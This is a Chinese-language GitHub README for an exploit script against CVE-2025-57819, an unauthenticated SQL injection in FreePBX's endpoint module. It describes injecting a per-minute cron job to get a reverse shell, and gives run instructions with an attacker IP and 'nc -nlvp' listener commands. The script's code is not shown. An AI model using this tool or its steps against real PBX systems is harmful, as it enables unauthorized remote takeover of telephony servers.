Its1Zero/cve-2025-57819-exploit
GitHub: Its1Zero/cve-2025-57819-exploit
针对 FreePBX endpoint 模块 CVE-2025-57819 SQL 注入漏洞的自动化利用脚本,通过注入 cron 定时任务直接获取反弹 shell。
Stars: 0 | Forks: 0
# CVE-2025-57819 Exploit
## 元数据
- **严重性:** Critical (9.8)
- **向量:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **类型:** 未授权 SQL Injection → Remote Code Execution
- **受影响软件:** FreePBX(endpoint 模块)`< 15.0.66`、`< 16.0.89` 和 `< 17.0.3`
- **测试环境:** CentOS 7 上基于 Apache 2.4 的 FreePBX 16.0.40.7
## 概述
此脚本利用易受攻击的 FreePBX endpoint 模块中的 [**CVE-2025-57819**](https://nvd.nist.gov/vuln/detail/cve-2025-57819)。该漏洞允许进行 SQL injection,进而被利用来注入恶意 cron job。
与其他公开的 exploit 不同,它_无需_通过上传的 webshell 与目标进行交互等额外步骤。这是一种直接的方法,将直接为您带来 reverse shell 访问权限。
## 影响
通过 SQL injection 和 cron job 操纵可实现 remote code execution。成功利用此漏洞将在目标系统上获取 reverse shell。根据具体配置,这可能导致系统被完全攻陷。
## 功能
- 通过易受攻击的 AJAX endpoint 进行 SQL injection
- 自动生成 reverse shell payload
- 通过每分钟执行一次(`* * * * *`)的计划任务实现 cron job 持久化
- 自动清理注入的 cron job
- 使用十六进制编码的 payload,因为当 `+` 字符被解析为空格时,`base64` payload 会被破坏。
## 用法
通过提供目标和监听器配置来运行此 exploit:
```
python3 cve-2025-57819.py
```
#### 参数
- ``:目标主机名或 IP 地址(易受攻击的 FreePBX 实例)
- ``:用于 reverse shell callback 的攻击者 IP 地址
- ``:用于接收传入连接的监听端口
#### 示例:
```
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
```
## 监听器设置
在执行 exploit 之前启动监听器:
```
nc -lvnp
```
#### 示例:
```
nc -nlvp 9999
```
## 免责声明
此工具仅供教育目的和授权的安全测试使用。未经明确许可对系统进行未经授权的使用是非法的。作者对因滥用此工具或由此造成的任何损害不承担任何责任。
## 作者
Its1Zero - ic47@protonmail.com
## 参考
- https://nvd.nist.gov/vuln/detail/cve-2025-57819
- https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
标签:CISA项目, PNNL实验室, 编程工具, 远程代码执行, 逆向工具